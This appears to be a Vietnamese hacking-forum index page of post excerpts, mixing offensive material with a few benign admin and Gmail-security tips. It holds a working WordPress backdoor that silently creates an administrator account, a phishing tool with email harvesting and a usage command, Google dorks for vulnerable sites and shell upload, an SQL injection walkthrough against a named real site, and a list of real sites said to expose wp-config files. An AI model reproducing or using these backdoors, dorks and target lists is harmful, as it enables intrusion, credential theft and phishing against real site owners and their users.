Phemail.py: Phishing EMail Social Engineering Tool

Social Engineering is defined as the process of inducing people into giving away access or confidential information. From a security consultant point of view this topic is not new and there are many tools which can be used against the target.

phemail.py - Phishing EMAIL. The main purpose of this tool is to prove who clicked on the phishing email without attempting to exploit the web browser but collecting as much information as possible. For this reason it will be 100% undetectable by any antivirus and it will obtain sufficient data to have an initial proof of concept for the client.

Steps to use Phemail.py:

1. Find corporate email addresses: Phemail has an option for harvesting corporate email addresses and save them to a file. Phemail.py leverages Google to search for LinkedIn specific corporate e-mail targets.
2. Create a phishing email template: You get to create your own custom phishing templates. Do not forget to add the string “{0}” in each URL as the script will replace this string with the correct URL automatically.
3. Host/upload a single PHP file: This file contains JavaScript code which attempts to collect web browser information and save it in a log file in /tmp directory.
4. Run the php file as shown in the following example: # phemail.py -e test-emails.txt -f "Tax report " -r "Tax Report " -s "Important information about your tax" -b body.txt -w http://YOUR-WEBSITE.com

Download Phemail.py

Xem Thêm

WordPress Admin Access Backdoor

<?php 
add_action('wp_head', 'my_backdoor'); 

function my_backdoor() { 
If ($_GET['backdoor'] == 'go') { 
require('wp-includes/registration.php'); 
If (!username_exists('private')) { 
$user_id = wp_create_user('private', '12345678'); 
$user = new WP_User($user_id); 
$user->set_role('administrator'); 
} 
} 
} 
?>

Xem Thêm

[TUT] Share Autotype

TUT Autotype
+ Chức Năng Coppy Text tự động điền vào form order Sau 3s
Link Download : http://www.mediafire.com/?214ra2fvzfsnh0k
Hướng Dẫn : http://www.mediafire.com/?bwbbdh0ei28pqdt
1, RUN Windows Installer 3.1
2, RUN Windows Imaging Component
3, RUN Microsoft .NET Framework 4
4, AutoTyper.exe

--------------------------------------------------------
1 - Windows Installer 3.1
http://www.microsoft.com/en-us/downl...ils.aspx?id=25
-------------
2 - Windows Imaging Component
http://www.microsoft.com/en-us/downl...ils.aspx?id=32
-------------
3 - Microsoft .NET Framework 4
http://www.microsoft.com/en-us/downl....aspx?id=17718

Xem Thêm

WordPress Blog Exploit

search google: inurl:"fbconnect_action=myhome"

thay
?fbconnect_action=myhome&userid=

Xem Thêm

dork up shell hình ảnh

Hidden Block (1 post(s) are required, you have 1): inurl:"modules/filemanagermodule/actions/?picker.php??id= 0"

Xem Thêm

Một số mẫu Regular Expressions

Regular Expressions xuất hiện một cách thường xuyên và gần như không thể thiếu với một lập trình viên chuyên nghiệp không chỉ trong PHP mà ở nhiều ngôn ngữ khác , nó rất tiện dụng và hữu ích. Xin giới thiệu một vài mẫu Regex hữu ích sau mà mình sưu tầm được

Xem Thêm

Hạn chế hack gmail

Khi bị người khác biết được pass gmail của mình thì việc bạn bị mất dữ liệu hoặc bí mật bên trong hộp thư của bạn là chắc. Vậy làm sao chúng ta khắc chế được để có bảo mật cao hơn? Thực ra trong gmail có chức năng kích hoạt 2 lớp cảnh báo bảo vệ, nếu áp dụng nó thì kể cả người ta biết pass gmail của ta cũng chưa chắc đã vào được hòm thư của mình.

Thủ thuật này được tôi tóm lược như sau:

1. Bạn click vào mục Accounts settings ở góc phải của hòm thư, sau đó Google sẽ chuyển giao diện đến trang thiết lập chung cho tài khoản Google Accounts.

Tại thẻ Security, mục Using 2-step verification bạn click chọn nút Edit để tiến hành kích hoạt chức năng chứng thực hai lớp.

[IMG][/IMG]

2. Sau đó Google sẽ chuyển đến các trang giới thiệu về tính năng bảo mật này. Bạn tiếp tục click See how it works! và Start setup để chuyển sang bước cài đặt mã chứng thực trên thiết bị di động.

[IMG][/IMG]

3. Tiếp theo bạn nhập số điện thoại và chọn cách nhận mã chứng thực qua tin nhắn (text messages) hay cuộc gọi thoại (voice call – ở đây bạn sẽ nhận được một cuộc gọi tự động đọc cho bạn mã xác nhận băng tiếng Anh). Bạn nên chọn hình thức SMS và nhấn Send code. Sau vài giây hệ thống sẽ gửi vào điện thoại của bạn mã số đăng ký.

[IMG][/IMG]

Bạn tiếp tục dùng mã số này để nhập vào ô trống trong phần Type the code you receive in the phone message, and click Verify. Hoàn tất công đoạn bạn nhấn Verify để xác nhận sử dụng số điện thoại di động trên để nhận mã chứng thực đăng nhập từ Google.
Sau bước này bạn có thể yên tâm vì hòm thư Gmail của mình đã được trang bị 2 tầng bảo vệ.
Chúc các bạn thành công!

Xem Thêm

[TUT] Bypass Filter + 403 Forbidden SQL Injection

Victim :

Quote:

http://spaadam.com/vi/news.php?newsid=108

check lỗi :

Quote:

http://spaadam.com/vi/news.php?newsid=108'

Quote:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

-> Lỗi rồi nhé ! tiếp tục order

Xem Thêm

Cách tạo user FPT trên VPS linux

đây là tut cài User FTP trên VPS CentOS đã cài đặt Apache, MySQL, PHP CentOS 

Đầu tiên là Vps đã cài Vsftpd 
Trên cửa sổ 
# chkconfig vsftpd on

Khởi động dịch vụ FTP

# service vsftpd start

# useradd ccv
# passwd adminccvug

Sẽ tạo ra một folder là /home/ccv, và ftp user này có quyền xem tùm lum kể cả thư mục root, vậy làm cách nào để phân quyền cho user này ?

Để ngăn việc này ta làm ntn??

Để ngăn không cho user trên SSH vào server và giới hạn thư mục của user FTP ta có thể làm như sau:
1. Không cho SSH và server :
- Thay đổi login shell thành /sbin/nologin :

Code:

root@ccv[/]# useradd ccv
root@ccv [/]# cat /etc/passwd | grep ccv
ccv:32025:32026::/home/ccv:/bin/bash
root@ccv [/]# usermod -s /sbin/nologin ccv
root@ccv [/]# cat /etc/passwd | grep ccv
ccv:32025:32026::/home/ccv:/sbin/nologin
root@ccv [/]#

=> Phần login shell của user đã được thay đổi.
- Hoặc khi tạo user mới các bạn thêm option -s /sbin/nologin vào 

Code:

root@ccv [/]# useradd -s /sbin/nologin ccv

2. Giới hạn thư mục trong FTP (chroot) :
- Chỉnh sửa file config của vsfpt :

Code:

root@ccv [/]# vi /etc/vsftpd/vsftpd.conf

- Sửa dòng này :

Code:

chroot_local_user=YES

- Restart lại vsftp :

Code:

root@training [/]# /etc/init.d/vsftpd restart

Xem Thêm

khai thác SQL inject thông qua cookie method: Session

Bài này mình Leech của Heaven bên HCE nhé. Thấy hay post cho anh em mong kiếm thanks
tool cần có: cookie manager dành cho firefox (tôi thích dùng firefox).
Code:

Code:

https://addons.mozilla.org/vi/firefox/addon/cookie-manager/

sau khi tiến hành cài đặt sẽ có biểu tượng CM bên góc trên bên phải 

Victim:

Xem Thêm

Exclamation Wordpress (.txt) Read Config Vulnerability

127.0.0.1/wp-config.txt

##################################

Demos:
http://pakde.com/wp-config.txt
http://www.stmarysbr...m/wp-config.txt
http://ganjalicious.com/wp-config.txt
http://publish.uwo.c...s/wp-config.txt
http://you-s.net/wp-config.txt
http://mr-bg.com/wp-config.txt
http://ekineo.es/blog/wp-config.txt
http://likeguitar.ru/wp-config.txt
http://aussen-sicher...e/wp-config.txt
http://changeitmarke...m/wp-config.txt
http://blog-haus.sve...e/wp-config.txt
http://blog.santabar...s/wp-config.txt
http://hawky.pl/wp-config.txt

More in Google,bing,ask .... =)

# 1337day.com [2012-09-29]

Xem Thêm